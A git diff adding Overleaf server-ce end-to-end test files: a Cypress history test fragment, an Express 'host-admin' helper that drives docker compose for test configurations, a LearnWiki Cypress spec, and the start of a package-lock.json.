'% to be removed') + .should('not.contain', '% more') + + downloadVersion('Current state') + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/labels (Version 4).zip`, + fileToRead: 'main.tex', + }) + .should('contain', '% added') + .should('not.contain', '% to be removed') + .should('contain', '% more') + }) +}) diff --git a/server-ce/test/host-admin.js b/server-ce/test/host-admin.js new file mode 100644 index 0000000..9e4cd5d --- /dev/null +++ b/server-ce/test/host-admin.js @@ -0,0 +1,331 @@ +const fs = require('fs') +const Path = require('path') +const { execFile } = require('child_process') +const express = require('express') +const bodyParser = require('body-parser') +const { + celebrate: validate, + Joi, + errors: handleValidationErrors, +} = require('celebrate') +const YAML = require('js-yaml') + +const DATA_DIR = Path.join( + __dirname, + 'data', + // Give each shard their own data dir. + process.env.CYPRESS_SHARD || 'default' +) +const PATHS = { + DOCKER_COMPOSE_FILE: 'docker-compose.yml', + // Give each shard their own override file. + DOCKER_COMPOSE_OVERRIDE: `docker-compose.${process.env.CYPRESS_SHARD || 'override'}.yml`, + DOCKER_COMPOSE_NATIVE: 'docker-compose.native.yml', + DATA_DIR, + SANDBOXED_COMPILES_HOST_DIR: Path.join(DATA_DIR, 'compiles'), +} +const IMAGES = { + CE: process.env.IMAGE_TAG_CE.replace(/:.+/, ''), + PRO: process.env.IMAGE_TAG_PRO.replace(/:.+/, ''), +} + +let previousConfig = '' + +function readDockerComposeOverride() { + try { + return YAML.load(fs.readFileSync(PATHS.DOCKER_COMPOSE_OVERRIDE, 'utf-8')) + } catch (error) { + if (error.code !== 'ENOENT') { + throw error + } + return { + services: { + sharelatex: { + environment: {}, + }, + 'git-bridge': {}, + }, + } + } +} + +function writeDockerComposeOverride(cfg) { + fs.writeFileSync(PATHS.DOCKER_COMPOSE_OVERRIDE, YAML.dump(cfg)) +} + +function runDockerCompose(command, args, callback) { + const files = ['-f', PATHS.DOCKER_COMPOSE_FILE] + if (process.env.NATIVE_CYPRESS) { + files.push('-f', PATHS.DOCKER_COMPOSE_NATIVE) + } + if (fs.existsSync(PATHS.DOCKER_COMPOSE_OVERRIDE)) { + files.push('-f', PATHS.DOCKER_COMPOSE_OVERRIDE) + } + execFile('docker', ['compose', ...files, command, ...args], callback) +} + +function purgeDataDir() { + fs.rmSync(PATHS.DATA_DIR, { recursive: true, force: true }) +} + +const app = express() +app.get('/status', (req, res) => { + res.send('host-admin is up') +}) + +app.use(bodyParser.json()) +app.use((req, res, next) => { + // Basic access logs + console.log(req.method, req.url, req.body) + // Add CORS headers + const accessControlAllowOrigin = + process.env.ACCESS_CONTROL_ALLOW_ORIGIN || 'http://sharelatex' + res.setHeader('Access-Control-Allow-Origin', accessControlAllowOrigin) + res.setHeader('Access-Control-Allow-Headers', 'Content-Type') + res.setHeader('Access-Control-Max-Age', '3600') + next() +}) + +app.post( + '/run/script', + validate( + { + body: { + cwd: Joi.string().required(), + script: Joi.string().required(), + args: Joi.array().items(Joi.string()), + }, + }, + { allowUnknown: false } + ), + (req, res) => { + const { cwd, script, args } = req.body + + runDockerCompose( + 'exec', + [ + 'sharelatex', + 'bash', + '-c', + `source /etc/container_environment.sh && source /etc/overleaf/env.sh || source /etc/sharelatex/env.sh && cd ${JSON.stringify(cwd)} && node ${JSON.stringify(script)} ${args.map(a => JSON.stringify(a)).join(' ')}`, + ], + (error, stdout, stderr) => { + res.json({ + error, + stdout, + stderr, + }) + } + ) + } +) + +const allowedVars = Joi.object( + Object.fromEntries( + [ + 'OVERLEAF_APP_NAME', + 'OVERLEAF_LEFT_FOOTER', + 'OVERLEAF_RIGHT_FOOTER', + 'OVERLEAF_PROXY_LEARN', + 'GIT_BRIDGE_ENABLED', + 'GIT_BRIDGE_HOST', + 'GIT_BRIDGE_PORT', + 'V1_HISTORY_URL', + 'DOCKER_RUNNER', + 'SANDBOXED_COMPILES', + 'SANDBOXED_COMPILES_SIBLING_CONTAINERS', + 'ALL_TEX_LIVE_DOCKER_IMAGE_NAMES', + 'OVERLEAF_TEMPLATES_USER_ID', + 'OVERLEAF_NEW_PROJECT_TEMPLATE_LINKS', + 'OVERLEAF_ALLOW_PUBLIC_ACCESS', + 'OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING', + 'EXTERNAL_AUTH', + 'OVERLEAF_SAML_ENTRYPOINT', + 'OVERLEAF_SAML_CALLBACK_URL', + 'OVERLEAF_SAML_ISSUER', + 'OVERLEAF_SAML_IDENTITY_SERVICE_NAME', + 'OVERLEAF_SAML_EMAIL_FIELD', + 'OVERLEAF_SAML_FIRST_NAME_FIELD', + 'OVERLEAF_SAML_LAST_NAME_FIELD', + 'OVERLEAF_SAML_UPDATE_USER_DETAILS_ON_LOGIN', + 'OVERLEAF_SAML_CERT', + 'OVERLEAF_LDAP_URL', + 'OVERLEAF_LDAP_SEARCH_BASE', + 'OVERLEAF_LDAP_SEARCH_FILTER', + 'OVERLEAF_LDAP_BIND_DN', + 'OVERLEAF_LDAP_BIND_CREDENTIALS', + 'OVERLEAF_LDAP_EMAIL_ATT', + 'OVERLEAF_LDAP_NAME_ATT', + 'OVERLEAF_LDAP_LAST_NAME_ATT', + 'OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN', + // Old branding, used for upgrade tests + 'SHARELATEX_SITE_URL', + 'SHARELATEX_MONGO_URL', + 'SHARELATEX_REDIS_HOST', + ].map(name => [name, Joi.string()]) + ) +) + +function setVarsDockerCompose({ pro, vars, version, withDataDir }) { + const cfg = readDockerComposeOverride() + + cfg.services.sharelatex.image = `${pro ? IMAGES.PRO : IMAGES.CE}:${version}` + cfg.services['git-bridge'].image = `quay.io/sharelatex/git-bridge:${version}` + + cfg.services.sharelatex.environment = vars + + if (cfg.services.sharelatex.environment.GIT_BRIDGE_ENABLED === 'true') { + cfg.services.sharelatex.depends_on = ['git-bridge'] + } else { + cfg.services.sharelatex.depends_on = [] + } + + if (['ldap', 'saml'].includes(vars.EXTERNAL_AUTH)) { + cfg.services.sharelatex.depends_on.push(vars.EXTERNAL_AUTH) + } + + const dataDirInContainer = + version === 'latest' || version >= '5.0' + ? '/var/lib/overleaf/data' + : '/var/lib/sharelatex/data' + + cfg.services.sharelatex.volumes = [] + if (withDataDir) { + cfg.services.sharelatex.volumes.push( + `${PATHS.DATA_DIR}:${dataDirInContainer}` + ) + } + + if ( + cfg.services.sharelatex.environment + .SANDBOXED_COMPILES_SIBLING_CONTAINERS === 'true' + ) { + cfg.services.sharelatex.environment.SANDBOXED_COMPILES_HOST_DIR = + PATHS.SANDBOXED_COMPILES_HOST_DIR + cfg.services.sharelatex.environment.TEX_LIVE_DOCKER_IMAGE = + process.env.TEX_LIVE_DOCKER_IMAGE + cfg.services.sharelatex.environment.ALL_TEX_LIVE_DOCKER_IMAGES = + process.env.ALL_TEX_LIVE_DOCKER_IMAGES + cfg.services.sharelatex.volumes.push( + '/var/run/docker.sock:/var/run/docker.sock' + ) + if (!withDataDir) { + cfg.services.sharelatex.volumes.push( + `${PATHS.SANDBOXED_COMPILES_HOST_DIR}:${dataDirInContainer}/compiles` + ) + } + } + + writeDockerComposeOverride(cfg) +} + +app.post( + '/docker/compose/:cmd', + validate( + { + body: { + args: Joi.array().allow( + '--detach', + '--wait', + '--volumes', + '--timeout=60', + 'sharelatex', + 'git-bridge', + 'mongo', + 'redis' + ), + }, + params: { + cmd: Joi.allow('up', 'stop', 'down', 'ps', 'logs'), + }, + }, + { allowUnknown: false } + ), + (req, res) => { + const { cmd } = req.params + const { args } = req.body + runDockerCompose(cmd, args, (error, stdout, stderr) => { + res.json({ error, stdout, stderr }) + }) + } +) + +function maybeResetData(resetData, callback) { + if (!resetData) return callback() + + previousConfig = '' + runDockerCompose( + 'down', + ['--timeout=0', '--volumes', 'mongo', 'redis', 'sharelatex'], + (error, stdout, stderr) => { + if (error) return callback(error, stdout, stderr) + + try { + purgeDataDir() + } catch (error) { + return callback(error) + } + callback() + } + ) +} + +app.post( + '/reconfigure', + validate( + { + body: { + pro: Joi.boolean().required(), + version: Joi.string().required(), + vars: allowedVars, + withDataDir: Joi.boolean().optional(), + resetData: Joi.boolean().optional(), + }, + }, + { allowUnknown: false } + ), + (req, res) => { + const { pro, version, vars, withDataDir, resetData } = req.body + maybeResetData(resetData, (error, stdout, stderr) => { + if (error) return res.json({ error, stdout, stderr }) + + const previousConfigServer = previousConfig + const newConfig = JSON.stringify(req.body) + if (previousConfig === newConfig) { + return res.json({ previousConfigServer }) + } + + try { + setVarsDockerCompose({ pro, version, vars, withDataDir }) + } catch (error) { + return res.json({ error }) + } + + if (error) return res.json({ error, stdout, stderr }) + runDockerCompose( + 'up', + ['--detach', '--wait', 'sharelatex'], + (error, stdout, stderr) => { + previousConfig = newConfig + res.json({ error, stdout, stderr, previousConfigServer }) + } + ) + }) + } +) + +app.get('/redis/keys', (req, res) => { + runDockerCompose( + 'exec', + ['redis', 'redis-cli', 'KEYS', '*'], + (error, stdout, stderr) => { + res.json({ error, stdout, stderr }) + } + ) +}) + +app.use(handleValidationErrors()) + +purgeDataDir() + +app.listen(80) diff --git a/server-ce/test/learn-wiki.spec.ts b/server-ce/test/learn-wiki.spec.ts new file mode 100644 index 0000000..c0cc872 --- /dev/null +++ b/server-ce/test/learn-wiki.spec.ts @@ -0,0 +1,106 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { v4 as uuid } from 'uuid' + +describe('LearnWiki', function () { + const COPYING_A_PROJECT_URL = '/learn/how-to/Copying_a_project' + const UPLOADING_A_PROJECT_URL = '/learn/how-to/Uploading_a_project' + + const WITHOUT_PROJECTS_USER = 'user-without-projects@example.com' + const REGULAR_USER = 'user@example.com' + + // Re-use value for "exists" and "does not exist" tests + const LABEL_LEARN_LATEX = 'Learn LaTeX with a tutorial' + + ensureUserExists({ email: WITHOUT_PROJECTS_USER }) + ensureUserExists({ email: REGULAR_USER }) + + describe('enabled in Pro', () => { + if (isExcludedBySharding('PRO_CUSTOM_2')) return + startWith({ + pro: true, + vars: { + OVERLEAF_PROXY_LEARN: 'true', + }, + }) + + it('should add a documentation entry to the nav bar', () => { + login(REGULAR_USER) + cy.visit('/project') + cy.get('nav').findByText('Documentation') + }) + + it('should display a tutorial link in the welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/project') + cy.findByText(LABEL_LEARN_LATEX) + }) + + it('should render wiki page', () => { + login(REGULAR_USER) + cy.visit(UPLOADING_A_PROJECT_URL) + // Wiki content + cy.get('.page').findByText('Uploading a project') + cy.get('.page').contains(/how to create an Overleaf project/) + cy.get('img[alt="Creating a new project on Overleaf"]') + .should('be.visible') + .and((el: any) => { + expect(el[0].naturalWidth, 'renders image').to.be.greaterThan(0) + }) + // Wiki navigation + cy.get('.contents').findByText('Copying a project') + }) + + it('should navigate back and forth', function () { + login(REGULAR_USER) + cy.visit(COPYING_A_PROJECT_URL) + cy.get('.page').findByText('Copying a project') + cy.get('.contents').findByText('Uploading a project').click() + cy.url().should('contain', UPLOADING_A_PROJECT_URL) + cy.get('.page').findByText('Uploading a project') + cy.get('.contents').findByText('Copying a project').click() + cy.url().should('contain', COPYING_A_PROJECT_URL) + cy.get('.page').findByText('Copying a project') + }) + }) + + describe('disabled in Pro', () => { + if (isExcludedBySharding('PRO_DEFAULT_1')) return + startWith({ pro: true }) + checkDisabled() + }) + + describe('unavailable in CE', () => { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ + pro: false, + vars: { + OVERLEAF_PROXY_LEARN: 'true', + }, + }) + + checkDisabled() + }) + + function checkDisabled() { + it('should not add a documentation entry to the nav bar', () => { + login(REGULAR_USER) + cy.visit('/project') + cy.findByText('Documentation').should('not.exist') + }) + + it('should not render wiki page', () => { + login(REGULAR_USER) + cy.visit(COPYING_A_PROJECT_URL, { + failOnStatusCode: false, + }) + cy.findByText('Not found') + }) + + it('should not display a tutorial link in the welcome page', () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/project') + cy.findByText(LABEL_LEARN_LATEX).should('not.exist') + }) + } +}) diff --git a/server-ce/test/package-lock.json b/server-ce/test/package-lock.json new file mode 100644 index 0000000..0587028 --- /dev/null +++ b/server-ce/test/package-lock.json @@ -0,0 +1,3538 @@ +{ + "name": "@overleaf/server-ce/test", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "@overleaf/server-ce/test", + "dependencies": { + "@isomorphic-git/lightning-fs": "^4.6.0", + "@testing-library/cypress": "^10.0.1", + "@types/adm-zip": "^0.5.5", + "@types/pdf-parse": "^1.1.4", + "@types/uuid": "^9.0.8", + "adm-zip": "^0.5.12", + "body-parser": "^1.20.3", + "celebrate": "^15.0.3", + "cypress": "13.13.2", + "express": "^4.21.2", + "isomorphic-git": "^1.25.10", + "js-yaml": "^4.1.0", + "pdf-parse": "^1.1.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1" + } + }, + "node_modules/@babel/code-frame": { + "version": "7.22.13", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", + "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "dependencies": { + "@babel/highlight": "^7.22.13", + "chalk": "^2.4.2" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/code-frame/node_modules/ansi-styles": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", + "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "dependencies": { + "color-convert": "^1.9.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/code-frame/node_modules/chalk": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", + "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "dependencies": { + "ansi-styles": "^3.2.1", + "escape-string-regexp": "^1.0.5", + "supports-color": "^5.3.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/code-frame/node_modules/color-convert": { + "version": "1.9.3", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", + "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "dependencies": { + "color-name": "1.1.3" + } + }, + "node_modules/@babel/code-frame/node_modules/color-name": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", + "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==" + }, + "node_modules/@babel/code-frame/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/code-frame/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/helper-validator-identifier": { + "version": "7.22.20", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", + "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/highlight": { + "version": "7.22.20", + "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", + "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "dependencies": { + "@babel/helper-validator-identifier": "^7.22.20", + "chalk": "^2.4.2", + "js-tokens": "^4.0.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/highlight/node_modules/ansi-styles": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", + "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "dependencies": { + "color-convert": "^1.9.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/highlight/node_modules/chalk": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", + "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "dependencies": { + "ansi-styles": "^3.2.1", + "escape-string-regexp": "^1.0.5", + "supports-color": "^5.3.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/highlight/node_modules/color-convert": { + "version": "1.9.3", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", + "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "dependencies": { + "color-name": "1.1.3" + } + }, + "node_modules/@babel/highlight/node_modules/color-name": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", + "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==" + }, + "node_modules/@babel/highlight/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/highlight/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/@babel/runtime": { + "version": "7.23.2", + "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.23.2.tgz", + "integrity": "sha512-mM8eg4yl5D6i3lu2QKPuPH4FArvJ8KhTofbE7jwMUv9KX5mBvwPAqnV3MlyBNqdp9RyRKP6Yck8TrfYrPvX3bg==", + "dependencies": { + "regenerator-runtime": "^0.14.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@colors/colors": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/@colors/colors/-/colors-1.5.0.tgz", + "integrity": "sha512-ooWCrlZP11i8GImSjTHYHLkvFDP48nS4+204nGb1RiX/WXYHmJA2III9/e2DWVabCESdW7hBAEzHRqUn9OUVvQ==", + "optional": true, + "engines": { + "node": ">=0.1.90" + } + }, + "node_modules/@cypress/request": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@cypress/request/-/request-3.0.1.tgz", + "integrity": "sha512-TWivJlJi8ZDx2wGOw1dbLuHJKUYX7bWySw377nlnGOW3hP9/MUKIsEdXT/YngWxVdgNCHRBmFlBipE+5/2ZZlQ==", + "dependencies": { + "aws-sign2": "~0.7.0", + "aws4": "^1.8.0", + "caseless": "~0.12.0", + "combined-stream": "~1.0.6", + "extend": "~3.0.2", + "forever-agent": "~0.6.1", + "form-data": "~2.3.2", + "http-signature": "~1.3.6", + "is-typedarray": "~1.0.0", + "isstream": "~0.1.2", + "json-stringify-safe": "~5.0.1", + "mime-types": "~2.1.19", + "performance-now": "^2.1.0", + "qs": "6.10.4", + "safe-buffer": "^5.1.2", + "tough-cookie": "^4.1.3", + "tunnel-agent": "^0.6.0", + "uuid": "^8.3.2" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@cypress/request/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@cypress/xvfb": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@cypress/xvfb/-/xvfb-1.2.4.tgz", + "integrity": "sha512-skbBzPggOVYCbnGgV+0dmBdW/s77ZkAOXIC1knS8NagwDjBrNC1LuXtQJeiN6l+m7lzmHtaoUw/ctJKdqkG57Q==", + "dependencies": { + "debug": "^3.1.0", + "lodash.once": "^4.1.1" + } + }, + "node_modules/@cypress/xvfb/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/@hapi/hoek": { + "version": "9.3.0", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-9.3.0.tgz", + "integrity": "sha512-/c6rf4UJlmHlC9b5BaNvzAcFv7HZ2QHaV0D4/HNlBdvFnvQq8RI4kYdhyPCl7Xj+oWvTWQ8ujhqS53LIgAe6KQ==" + }, + "node_modules/@hapi/topo": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@hapi/topo/-/topo-5.1.0.tgz", + "integrity": "sha512-foQZKJig7Ob0BMAYBfcJk8d77QtOe7Wo4ox7ff1lQYoNNAb6jwcY1ncdoy2e9wQZzvNy7ODZCYJkK8kzmcAnAg==", + "dependencies": { + "@hapi/hoek": "^9.0.0" + } + }, + "node_modules/@isomorphic-git/idb-keyval": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/@isomorphic-git/idb-keyval/-/idb-keyval-3.3.2.tgz", + "integrity": "sha512-r8/AdpiS0/WJCNR/t/gsgL+M8NMVj/ek7s60uz3LmpCaTF2mEVlZJlB01ZzalgYzRLXwSPC92o+pdzjM7PN/pA==" + }, + "node_modules/@isomorphic-git/lightning-fs": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/@isomorphic-git/lightning-fs/-/lightning-fs-4.6.0.tgz", + "integrity": "sha512-tfon8f1h6LawjFI/d8lZPWRPTxmdvyTMbkT/j5yo6dB0hALhKw5D9JsdCcUu/D1pAcMMiU7GZFDsDGqylerr7g==", + "dependencies": { + "@isomorphic-git/idb-keyval": "3.3.2", + "isomorphic-textencoder": "1.0.1", + "just-debounce-it": "1.1.0", + "just-once": "1.1.0" + }, + "bin": { + "superblocktxt": "src/superblocktxt.js" + } + }, + "node_modules/@sideway/address": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/@sideway/address/-/address-4.1.5.tgz", + "integrity": "sha512-IqO/DUQHUkPeixNQ8n0JA6102hT9CmaljNTPmQ1u8MEhBo/R4Q8eKLN/vGZxuebwOroDB4cbpjheD4+/sKFK4Q==", + "dependencies": { + "@hapi/hoek": "^9.0.0" + } + }, + "node_modules/@sideway/formula": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@sideway/formula/-/formula-3.0.1.tgz", + "integrity": "sha512-/poHZJJVjx3L+zVD6g9KgHfYnb443oi7wLu/XKojDviHy6HOEOA6z1Trk5aR1dGcmPenJEgb2sK2I80LeS3MIg==" + }, + "node_modules/@sideway/pinpoint": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@sideway/pinpoint/-/pinpoint-2.0.0.tgz", + "integrity": "sha512-RNiOoTPkptFtSVzQevY/yWtZwf/RxyVnPy/OcA9HBM3MlGDnBEYL5B41H0MTn0Uec8Hi+2qUtTfG2WWZBmMejQ==" + }, + "node_modules/@testing-library/cypress": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@testing-library/cypress/-/cypress-10.0.1.tgz", + "integrity": "sha512-e8uswjTZIBhaIXjzEcrQQ8nHRWHgZH7XBxKuIWxZ/T7FxfWhCR48nFhUX5nfPizjVOKSThEfOSv67jquc1ASkw==", + "dependencies": { + "@babel/runtime": "^7.14.6", + "@testing-library/dom": "^9.0.0" + }, + "engines": { + "node": ">=12", + "npm": ">=6" + }, + "peerDependencies": { + "cypress": "^12.0.0 || ^13.0.0" + } + }, + "node_modules/@testing-library/dom": { + "version": "9.3.3", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-9.3.3.tgz", + "integrity": "sha512-fB0R+fa3AUqbLHWyxXa2kGVtf1Fe1ZZFr0Zp6AIbIAzXb2mKbEXl+PCQNUOaq5lbTab5tfctfXRNsWXxa2f7Aw==", + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + "aria-query": "5.1.3", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@types/adm-zip": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/@types/adm-zip/-/adm-zip-0.5.5.tgz", + "integrity": "sha512-YCGstVMjc4LTY5uK9/obvxBya93axZOVOyf2GSUulADzmLhYE45u2nAssCs/fWBs1Ifq5Vat75JTPwd5XZoPJw==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/aria-query": { + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.3.tgz", + "integrity": "sha512-0Z6Tr7wjKJIk4OUEjVUQMtyunLDy339vcMaj38Kpj6jM2OE1p3S4kXExKZ7a3uXQAPCoy3sbrP1wibDKaf39oA==" + }, + "node_modules/@types/node": { + "version": "18.18.8", + "resolved": "https://registry.npmjs.org/@types/node/-/node-18.18.8.tgz", + "integrity": "sha512-OLGBaaK5V3VRBS1bAkMVP2/W9B+H8meUfl866OrMNQqt7wDgdpWPp5o6gmIc9pB+lIQHSq4ZL8ypeH1vPxcPaQ==", + "dependencies": { + "undici-types": "~5.26.4" + } + }, + "node_modules/@types/pdf-parse": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/@types/pdf-parse/-/pdf-parse-1.1.4.tgz", + "integrity": "sha512-+gbBHbNCVGGYw1S9lAIIvrHW47UYOhMIFUsJcMkMrzy1Jf0vulBN3XQIjPgnoOXveMuHnF3b57fXROnY/Or7eg==" + }, + "node_modules/@types/sinonjs__fake-timers": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/@types/sinonjs__fake-timers/-/sinonjs__fake-timers-8.1.1.tgz", + "integrity": "sha512-0kSuKjAS0TrGLJ0M/+8MaFkGsQhZpB6pxOmvS3K8FYI72K//YmdfoW9X2qPsAKh1mkwxGD5zib9s1FIFed6E8g==" + }, + "node_modules/@types/sizzle": { + "version": "2.3.5", + "resolved": "https://registry.npmjs.org/@types/sizzle/-/sizzle-2.3.5.tgz", + "integrity": "sha512-tAe4Q+OLFOA/AMD+0lq8ovp8t3ysxAOeaScnfNdZpUxaGl51ZMDEITxkvFl1STudQ58mz6gzVGl9VhMKhwRnZQ==" + }, + "node_modules/@types/uuid": { + "version": "9.0.8", + "resolved": "https://registry.npmjs.org/@types/uuid/-/uuid-9.0.8.tgz", + "integrity": "sha512-jg+97EGIcY9AGHJJRaaPVgetKDsrTgbRjQ5Msgjh/DQKEFl0DtyRr/VCOyD1T2R1MNeWPK/u7JoGhlDZnKBAfA==" + }, + "node_modules/@types/yauzl": { + "version": "2.10.2", + "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.10.2.tgz", + "integrity": "sha512-Km7XAtUIduROw7QPgvcft0lIupeG8a8rdKL8RiSyKvlE7dYY31fEn41HVuQsRFDuROA8tA4K2UVL+WdfFmErBA==", + "optional": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/accepts": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz", + "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==", + "dependencies": { + "mime-types": "~2.1.34", + "negotiator": "0.6.3" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/adm-zip": { + "version": "0.5.12", + "resolved": "https://registry.npmjs.org/adm-zip/-/adm-zip-0.5.12.tgz", + "integrity": 